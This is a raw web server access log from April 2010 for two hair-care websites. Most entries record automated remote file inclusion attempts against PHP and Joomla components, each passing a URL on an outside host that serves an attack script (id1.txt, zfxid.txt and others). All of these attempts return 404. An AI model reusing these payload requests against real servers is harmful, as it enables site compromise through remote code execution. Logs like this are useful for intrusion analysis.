61.67.201.187 - - [19/Apr/2010:03:07:59 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:03:07:59 -0700] "GET /logs/access.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:03:07:59 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.195.112.151 - - [19/Apr/2010:03:08:02 -0700] "GET /tmp/ HTTP/1.0" 200 643 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:03:08:11 -0700] "GET /logs/access_100412.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:03:08:53 -0700] "GET /logs/access_100412.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [19/Apr/2010:03:09:26 -0700] "GET /logs/access_100412.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.195.112.151 - - [19/Apr/2010:03:09:39 -0700] "GET /tmp/mailError.log HTTP/1.0" 200 62167 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
67.195.112.151 - - [19/Apr/2010:03:10:22 -0700] "GET /tmp/?S=A HTTP/1.0" 200 643 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
67.195.112.151 - - [19/Apr/2010:03:10:40 -0700] "GET /tmp/?M=A HTTP/1.0" 200 643 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
67.195.112.151 - - [19/Apr/2010:03:11:05 -0700] "GET /tmp/?N=D HTTP/1.0" 200 643 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
110.45.143.142 - - [19/Apr/2010:03:12:26 -0700] "GET /logs/access_100315.log%20%20/////delete_comment.php?board_skin_path=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.143.142 - - [19/Apr/2010:03:12:26 -0700] "GET ////delete_comment.php?board_skin_path=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.143.142 - - [19/Apr/2010:03:12:29 -0700] "GET /logs/////delete_comment.php?board_skin_path=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.143.142 - - [19/Apr/2010:03:12:33 -0700] "GET /logs/access_100315.log%20%20/////delete_comment.php?board_skin_path=http://freecopts.net/arabic//id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.143.142 - - [19/Apr/2010:03:12:33 -0700] "GET ////delete_comment.php?board_skin_path=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.143.142 - - [19/Apr/2010:03:12:34 -0700] "GET /logs/////delete_comment.php?board_skin_path=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.143.142 - - [19/Apr/2010:03:14:25 -0700] "GET ////delete_comment.php?board_skin_path=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.143.142 - - [19/Apr/2010:03:14:25 -0700] "GET /logs/////delete_comment.php?board_skin_path=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.143.142 - - [19/Apr/2010:03:14:26 -0700] "GET /logs/access_100315.log%20%20/////delete_comment.php?board_skin_path=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
87.106.132.3 - - [19/Apr/2010:03:19:35 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
87.106.132.3 - - [19/Apr/2010:03:19:35 -0700] "GET /logs/access_100412.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
87.106.132.3 - - [19/Apr/2010:03:19:35 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
207.58.185.118 - - [19/Apr/2010:03:20:48 -0700] "GET /components/com_sef/sef.class.php?mosConfig.absolute.path=http://www.valmarko.lv/ru/cache/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
207.58.185.118 - - [19/Apr/2010:03:20:48 -0700] "GET /logs/components/com_sef/sef.class.php?mosConfig.absolute.path=http://www.valmarko.lv/ru/cache/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
207.58.185.118 - - [19/Apr/2010:03:20:48 -0700] "GET /logs/access_100308.log/components/com_sef/sef.class.php?mosConfig.absolute.path=http://www.valmarko.lv/ru/cache/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
87.106.132.3 - - [19/Apr/2010:03:21:31 -0700] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
207.58.185.118 - - [19/Apr/2010:03:21:51 -0700] "GET /components/com_sef/sef.class.php?mosConfig.absolute.path=http://www.valmarko.lv/ru/cache/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
207.58.185.118 - - [19/Apr/2010:03:21:51 -0700] "GET /logs/access_100308.log%20%20/components/com_sef/sef.class.php?mosConfig.absolute.path=http://www.valmarko.lv/ru/cache/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
207.58.185.118 - - [19/Apr/2010:03:21:51 -0700] "GET /logs/components/com_sef/sef.class.php?mosConfig.absolute.path=http://www.valmarko.lv/ru/cache/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.195.112.151 - - [19/Apr/2010:03:25:08 -0700] "GET /tmp/?D=A HTTP/1.0" 200 643 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
69.72.194.58 - - [19/Apr/2010:03:35:04 -0700] "GET /logs////delete_comment.php?board_skin_path=http://freecopts.net/arabic//id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.72.194.58 - - [19/Apr/2010:03:35:04 -0700] "GET ///delete_comment.php?board_skin_path=http://freecopts.net/arabic//id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.72.194.58 - - [19/Apr/2010:03:35:04 -0700] "GET /logs/access.log////delete_comment.php?board_skin_path=http://freecopts.net/arabic//id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.55.232.50 - - [19/Apr/2010:03:36:22 -0700] "GET /http://moncrot.justfree.com/idourcrew.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "growlonghairfast.com"
66.113.99.66 - - [19/Apr/2010:03:44:16 -0700] "GET /logs/access.log////delete_comment.php?board_skin_path=http://freecopts.net/arabic//id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.113.99.66 - - [19/Apr/2010:03:44:16 -0700] "GET ///delete_comment.php?board_skin_path=http://freecopts.net/arabic//id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.113.99.66 - - [19/Apr/2010:03:44:16 -0700] "GET /logs////delete_comment.php?board_skin_path=http://freecopts.net/arabic//id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.195.114.238 - - [19/Apr/2010:03:51:50 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.freehairsecrets.com"
67.195.114.238 - - [19/Apr/2010:03:51:50 -0700] "GET /tmp/?M=A HTTP/1.0" 200 643 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.freehairsecrets.com"
67.195.112.151 - - [19/Apr/2010:03:59:10 -0700] "GET /freehairsecretsphp/viewtopic.php?p=16503 HTTP/1.0" 200 333 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
216.129.119.41 - - [19/Apr/2010:04:03:02 -0700] "GET /freehairsecretsphp/viewtopic.php?p=8260 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.freehairsecrets.com"
110.45.143.142 - - [19/Apr/2010:04:03:18 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.143.142 - - [19/Apr/2010:04:03:25 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.143.142 - - [19/Apr/2010:04:03:25 -0700] "GET /logs/access.log%20%20//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.143.142 - - [19/Apr/2010:04:05:22 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.143.142 - - [19/Apr/2010:04:05:32 -0700] "GET /logs/access.log%20%20//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.143.142 - - [19/Apr/2010:04:05:33 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.143.142 - - [19/Apr/2010:04:06:10 -0700] "GET ////delete_comment.php?board_skin_path=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
110.45.143.142 - - [19/Apr/2010:04:06:10 -0700] "GET /logs/////delete_comment.php?board_skin_path=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
110.45.143.142 - - [19/Apr/2010:04:06:10 -0700] "GET /logs/access.log/////delete_comment.php?board_skin_path=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
110.45.143.142 - - [19/Apr/2010:04:08:49 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.143.142 - - [19/Apr/2010:04:08:49 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.143.142 - - [19/Apr/2010:04:08:49 -0700] "GET /logs/access.log%20%20//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
213.251.189.204 - - [19/Apr/2010:04:08:50 -0700] "GET /logs/access_100308.log%20%20//write_update.php?board_skin_path=http://freecopts.net/arabic//zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
213.251.189.204 - - [19/Apr/2010:04:08:50 -0700] "GET /write_update.php?board_skin_path=http://freecopts.net/arabic//zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
213.251.189.204 - - [19/Apr/2010:04:08:50 -0700] "GET /logs//write_update.php?board_skin_path=http://freecopts.net/arabic//zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
94.136.59.102 - - [19/Apr/2010:04:09:30 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
92.48.73.232 - - [19/Apr/2010:04:09:33 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
213.175.207.62 - - [19/Apr/2010:04:10:06 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
110.45.143.142 - - [19/Apr/2010:04:11:52 -0700] "GET /logs/access_100412.log%20%20//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.143.142 - - [19/Apr/2010:04:12:41 -0700] "GET ////delete_comment.php?board_skin_path=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
110.45.143.142 - - [19/Apr/2010:04:12:41 -0700] "GET /logs/////delete_comment.php?board_skin_path=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
110.45.143.142 - - [19/Apr/2010:04:12:42 -0700] "GET /logs/access.log/////delete_comment.php?board_skin_path=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
110.45.143.142 - - [19/Apr/2010:04:14:02 -0700] "GET /logs/access_100412.log%20%20//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
213.251.189.204 - - [19/Apr/2010:04:15:38 -0700] "GET /write_update.php?board_skin_path=http://freecopts.net/arabic//zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
213.251.189.204 - - [19/Apr/2010:04:15:38 -0700] "GET /logs/access.log%20%20//write_update.php?board_skin_path=http://freecopts.net/arabic//zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
213.251.189.204 - - [19/Apr/2010:04:15:38 -0700] "GET /logs//write_update.php?board_skin_path=http://freecopts.net/arabic//zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
221.212.177.254 - - [19/Apr/2010:04:15:42 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "growlonghairfast.com"
110.45.143.142 - - [19/Apr/2010:04:16:16 -0700] "GET /logs/access.log/////delete_comment.php?board_skin_path=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.143.142 - - [19/Apr/2010:04:18:23 -0700] "GET ////delete_comment.php?board_skin_path=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
110.45.143.142 - - [19/Apr/2010:04:18:23 -0700] "GET /logs/access.log/////delete_comment.php?board_skin_path=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
110.45.143.142 - - [19/Apr/2010:04:18:26 -0700] "GET /logs/////delete_comment.php?board_skin_path=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
92.48.73.232 - - [19/Apr/2010:04:18:41 -0700] "GET /logs/access_100412.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
92.48.73.232 - - [19/Apr/2010:04:18:41 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
92.48.73.232 - - [19/Apr/2010:04:18:41 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
110.45.143.142 - - [19/Apr/2010:04:18:58 -0700] "GET ///delete_comment.php?board_skin_path=http://freecopts.net/arabic//id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.143.142 - - [19/Apr/2010:04:18:58 -0700] "GET /logs/access.log////delete_comment.php?board_skin_path=http://freecopts.net/arabic//id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.143.142 - - [19/Apr/2010:04:18:58 -0700] "GET /logs////delete_comment.php?board_skin_path=http://freecopts.net/arabic//id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.143.142 - - [19/Apr/2010:04:23:41 -0700] "GET /logs/access.log/////delete_comment.php?board_skin_path=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
213.251.189.204 - - [19/Apr/2010:04:23:59 -0700] "GET /logs/access.log//write_update.php?board_skin_path=http://freecopts.net/arabic//zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
213.251.189.204 - - [19/Apr/2010:04:23:59 -0700] "GET /logs/access_100308.log//write_update.php?board_skin_path=http://freecopts.net/arabic//zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
213.251.189.204 - - [19/Apr/2010:04:24:13 -0700] "GET /logs/access_100322.log//write_update.php?board_skin_path=http://freecopts.net/arabic//zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
94.136.59.102 - - [19/Apr/2010:04:24:46 -0700] "GET /logs/access_100412.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
94.136.59.102 - - [19/Apr/2010:04:24:46 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
94.136.59.102 - - [19/Apr/2010:04:24:46 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
211.43.210.73 - - [19/Apr/2010:04:25:04 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://125.249.199.195/php/bbs//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.43.210.73 - - [19/Apr/2010:04:25:04 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://125.249.199.195/php/bbs//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.43.210.73 - - [19/Apr/2010:04:25:04 -0700] "GET /logs/access_100308.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://125.249.199.195/php/bbs//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [19/Apr/2010:04:25:24 -0700] "GET /logs/access_100118.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
213.175.207.62 - - [19/Apr/2010:04:26:06 -0700] "GET /logs/access.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
213.175.207.62 - - [19/Apr/2010:04:26:06 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
213.175.207.62 - - [19/Apr/2010:04:26:06 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
110.45.143.142 - - [19/Apr/2010:04:26:09 -0700] "GET /logs////delete_comment.php?board_skin_path=http://freecopts.net/arabic//id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.143.142 - - [19/Apr/2010:04:26:09 -0700] "GET ///delete_comment.php?board_skin_path=http://freecopts.net/arabic//id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.143.142 - - [19/Apr/2010:04:26:10 -0700] "GET /logs/access.log////delete_comment.php?board_skin_path=http://freecopts.net/arabic//id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.53.131.149 - - [19/Apr/2010:04:26:35 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; XMPP Tiscali Communicator v.10.0.2; .NET CLR 2.0.50727)" "growlonghairfast.com"
208.53.131.149 - - [19/Apr/2010:04:26:35 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; XMPP Tiscali Communicator v.10.0.2; .NET CLR 2.0.50727)" "growlonghairfast.com"
92.48.73.232 - - [19/Apr/2010:04:27:43 -0700] "GET /logs/access_100322.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
213.251.189.204 - - [19/Apr/2010:04:28:00 -0700] "GET /logs/access_100412.log//write_update.php?board_skin_path=http://freecopts.net/arabic//zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
213.175.207.62 - - [19/Apr/2010:04:31:18 -0700] "GET /logs/access_100322.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
213.175.207.62 - - [19/Apr/2010:04:31:18 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
213.175.207.62 - - [19/Apr/2010:04:31:18 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
88.250.57.232 - - [19/Apr/2010:04:34:23 -0700] "GET /logs/access_100419.log HTTP/1.0" 200 2205014 "-" "Wget/1.11.4" "www.freehairsecrets.com"
213.175.207.62 - - [19/Apr/2010:04:35:57 -0700] "GET /logs/access.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
88.250.57.232 - - [19/Apr/2010:04:36:16 -0700] "GET /logs/access_100419.log HTTP/1.0" 200 2205014 "-" "Wget/1.11.4" "growlonghairfast.com"
221.212.177.254 - - [19/Apr/2010:04:43:28 -0700] "GET /logs/access_100412.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "growlonghairfast.com"
221.212.177.254 - - [19/Apr/2010:04:43:28 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "growlonghairfast.com"
221.212.177.254 - - [19/Apr/2010:04:43:29 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "growlonghairfast.com"
186.28.232.13 - - [19/Apr/2010:04:52:57 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_extcalendar&_REQUEST[Itemid]=10&GLOBALS=&mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
186.28.232.13 - - [19/Apr/2010:04:52:57 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=option,com_extcalendar&_REQUEST[Itemid]=10&GLOBALS=&mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
